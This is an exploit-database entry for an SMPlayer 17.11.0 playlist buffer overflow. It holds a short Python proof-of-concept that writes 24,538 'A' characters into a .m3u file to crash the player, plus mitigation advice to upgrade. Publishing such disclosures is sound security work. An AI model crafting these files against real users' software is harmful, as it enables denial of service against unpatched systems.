header-logo
Suggest Exploit
vendor:
SMPlayer
by:
bzyo
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: SMPlayer
Affected Version From: 17.11.0
Affected Version To: 17.11.0
Patch Exists: YES
Related CWE: N/A
CPE: a:smplayer:smplayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x64
2017

SMPlayer 17.11.0 – ‘.m3u’ Crash (PoC)

SMPlayer 17.11.0 is vulnerable to a buffer overflow vulnerability when opening a specially crafted .m3u file. The vulnerability can be triggered by creating a .m3u file with a string of 24538 'A' characters and opening it twice in the application. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of SMPlayer.
Source

Exploit-DB raw data:

#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: SMPlayer 17.11.0 - '.m3u' Crash (PoC)
# Date: 05-11-2017
# Vulnerable Software: SMPlayer v17.11.0
# Vendor Homepage: http://www.smplayer.info
# Version: v17.11.0
# Software Link: http://www.smplayer.info/en/downloads
# Tested On: Windows 7 x64
#
#
# PoC: generate crash.m3u, open playlist twice in app
#
#

file="crash.m3u"

crash = "A"*24538  		#crashes on 24538, but more will do
 
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()

Navigation

Suggest Exploit

Services By CQR